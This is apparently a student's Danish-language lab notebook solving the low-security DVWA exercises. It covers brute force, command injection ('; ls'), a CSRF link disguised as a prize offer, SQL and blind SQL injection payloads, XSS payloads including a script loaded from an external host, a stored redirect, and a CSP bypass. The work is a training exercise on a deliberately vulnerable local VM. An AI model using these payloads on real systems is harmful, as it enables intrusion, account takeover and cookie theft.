# Brute Force
Mål: "Your goal is to get the administrator’s password by brute forcing"
![Low Sikkerhed](../images/DVWA/bruteforcelogin.png)

Sikkerhed: "The developer has completely missed out any protections methods, allowing for anyone to try as many times as they wish, to login to any user without any repercussions."

Ide: bruge WFuzz og seclists til at brute force en masse forskellige passwords.

- Da sikkerheden på dette niveau er så lavt, bruger den URL til at pass username og password i plaintext. Kunne ikke få WFuzz til at virke på URL level, så skiftede til Burp Suite og brugte intruder der.
    ![Success](../images/DVWA/DVWAbruteforcelow.png)

# Command Injection
Mål: At bruge ping command til at execute en Linux-baseret command. 
![Command Injection](../images/DVWA/commandinjectionping.png)

Videns behov: læs op på forskellige måder at gøre command injection på. (Husk lav security level).

- https://owasp.org/www-community/attacks/Command_Injection
    - "However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:"

Ide: Tilføj "; ls" efter ping target.

![Success](../images/DVWA/commandinjectionpingsuccess.png)

# Cross Site Request Forgery
Mål: "Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack."

![CSRF](../images/DVWA/CrossSiteRequestForgery.png)

Sikkerhed: "There are no measures in place to protect against this attack. This means a link can be crafted to achieve a certain action (in this case, change the current users password). Then with some basic social engineering, have the target click the link (or just visit a certain page), to trigger the action."

Videns behov: se på URL når der password ændres.

Ide: Sæt et link op som sådan her: http://192.168.209.129:1335/vulnerabilities/csrf/?password_new=Password3&password_conf=Password3&Change=Change# som kan blive skjult under noget som "[Click here for 10 million dollars!](http://192.168.209.129:1335/vulnerabilities/csrf/?password_new=Password3&password_conf=Password3&Change=Change#)"

# File Upload
Mål: "Execute any PHP function of your choosing on the target system (such as phpinfo() or system()) thanks to this file upload vulnerability."

![File Upload](../images/DVWA/FileUpload.png)

Sikkerhed: "Low level will not check the contents of the file being uploaded in any way. It relies only on trust."

Videns behov: dette bruger PHP så bliver nød til at finde commands fra det (DVWA kommer med eksemplerne phpinfo() og system()).
- https://www.php.net/manual/en/function.phpinfo.php

Ide: upload en fil med phpinfo(INFO_CREDITS).

- Tog mig lidt tid at finde ud af at jeg skulle ændre URL'en for at se output.
- ![Success](../images/DVWA/FileUploadphpcredits.png)

# SQL injection

![SQLInjectionOpgave](../images/DVWA/SQLInjectionOpgave.png)

Mål: at få passwords over de 5 users der er i databasen.

Videns behov: SQL injection metoder.

Sikkerhed: "The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able to execute any SQL query they wish."

- Denne opgave tog en del tid, og jeg blev i sidste ende nød til at opsøge en walktrhough (https://medium.com/@aayushtiruwa120/dvwa-sql-injection-91b4efb683e4) for at kunne komme igennem det.
Har derfor ikke tænkt mig at lave mig egen "walkthrough", dog vil jeg komme med nogle noter.
- Vigtige ting: ```UNION``` parameter for SQL til at combine indbygget command med user-defined.
    - ```information_schema.tables``` - til at dump table names
    - ```information_schema.columns``` - til at dump column names (under et table)

# SQL injection (Blind)

![SQLInjectionBlindOpgave](../images/DVWA/SQLInjectionBlindOpgave.png)

Mål: Find SQL versionen

Videns behov: hvordan man finder SQL version og hvordan man griber an i.fht. blind SQL injections

Sikkerhed: "The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able to execute any SQL query they wish."

https://portswigger.net/web-security/sql-injection/blind

- ```AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm```
    - Hvis vi ændre det til noget der kan bruges i.fht. vores mål:
        - ```1' AND SUBSTRING((SELECT @@version), 1, 1) > '0```
            - Dette kommer tilbage med en TRUE value ("User ID exists in the database.")
            - Faktisk skal vi bruge ascii() command til at transformer resultat fra @@version.
                - https://lakshmi993.medium.com/blind-sql-injection-mysql-data-base-d2f35afbc451
                    - ```1' AND SUBSTRING((SELECT ascii(@@version)), 1, 1) > '0```

                    - ![SQLBlindSuccess](../images/DVWA/SQLBlindSuccess.png)
                        - Ved at gå +1 efter hvert true response, kan vi finde første character af resultatet: 39 hvilket betyder '
                        - Har ikke tænkt mig at gå alle de her igennem til at finde versionen, mere "proof of concept".

# Weak Session IDs

![WeakSessionIDOpgave](../images/DVWA/WeakSessionIDOpgave.png)

Mål: at finde ud af logikken bag session IDs

Ide: klik på Generate og se hvad der kommer frem under cookies![Weak Session IDs](../images/DVWA/weaksessionIDs.png)

- Når jeg så trykker på generate:

   ![Generated](../images/DVWA/weaksessioncookie.png)

- Efter at have trykket et par gange:

    ![generated](../images/DVWA/weaksessioncookieslater.png)
    - Så den går bare +1 for hvert tryk.

# XSS (DOM)

![XSSDomOpgave](../images/DVWA/XSSDomOpgave.png)

Mål: At køre JavaScript ved bare at klikke på et link.

Videns behov: JavaScript viden (kan godt huske noget om alert script fra sidste semester)

Sikkerhed: "Low level will not check the requested input, before including it to be used in the output text."

- https://stackoverflow.com/questions/17062379/how-to-add-scriptalerttest-script-inside-a-text-box

    - Ved bare at tilføje til URL får vi: http://192.168.209.129:1335/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(%27test%27);%3C/script%3E

        ![XSS DOM](../images/DVWA/XSSjavascript.png)

        - Testede også lidt i.fht. cookies osv, ved brug af et af OWASP's cheat sheets (nok overkill i.fht. low security): https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md
            - Ved at append ```<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>```

            ![OWASP JavaScript](../images/DVWA/XSSOwasp.png)

# XSS (Reflected)

![XSSReflectedOpgave](../images/DVWA/XSSReflectedOpgave.png)

Mål: at stjæle cookie fra en logged in user

Sikkerhed: Samme som i XSS (DOM)

Præcis hvad jeg gjorde i XSS (Dom)

# XSS (Stored)

![XSSStoredOpgave](../images/DVWA/XSSStoredOpgave.png)

Mål: At få opsat en redirect i serveren.

Sikkerhed: Samme som i tidligere XSS opgaver.

Videns behov: hvordan man opsætter re-directs.

- https://www.w3schools.com/howto/howto_js_redirect_webpage.asp
    - ```<script> window.location.replace("https://www.google.com");</script>``` 
        - Havde i første runde problemer med hvorfor det ikke virkede, fandt ud af inputtet i browseren er character limited:
        ![limited](../images/DVWA/XSSstoredcharacterlimit.png)
        - Ved at bruge Burp Suite kunne jeg nemt overkomme dette:
        ![Burp Suite](../images/DVWA/XSSstoredcharacterburpsuite.png)
        - Redirect: ![Redirect](../images/DVWA/XSSstoredredirect.png) (Note: referer)

# CSP Bypass

![CSPBypassOpgave](../images/DVWA/CSPBypassOpgave.png)

Mål: at bypass de opsatte CSP regler.

Videns behov: reglerne for CSP

![CSP](../images/DVWA/CSPrules.png)

Ide: Som kan ses er det muligt at loade scripts fra de hjemmesider. Derfor kan et script gemmes på pastebin, og bypass CSP filter.

- Problem: man kan ikke gemme pastebins som .js filer, derfor køres de ikke som javascripts, men bare som text:

![pastebin](../images/DVWA/CSPpastebin.png)

# JavaScript

![JavaScriptOpgave](../images/DVWA/JavaScriptOpgave.png)

Mål: at submit ordet "success" og få "Well Done" tilbage.

Videns behov: "View Source"

![JavaSourceLow](../images/DVWA/JavaSourceLow.png)

- Vi kan se at der er noget med "Rot13" og MD5.
- Hvis vi bare submitter "success" får vi "Invalid Token" som respons.

![Invalid Token](../images/DVWA/JavaLowInvalidToken.png)

- Så vi må skulle ændre token til noget andet.
    - Ved at decrypt MD5 får vi "PunatrZr", hvis vi så putter det gennem en ROT13 decoder får vi "ChangeMe".
    - Hvis vi følger samme logik som på siden (Hvor vi skal ændre ChangeMe til success), encoder vi først med ROT13 til "fhpprff" og derefter til MD5 "38581812b435834ebf84ebcc2c6424d6".
    - Hvis vi bruger denne token til at submit, får vi "Well Done"
    ![Well Done](../images/DVWA/JavaScriptLowDone.png)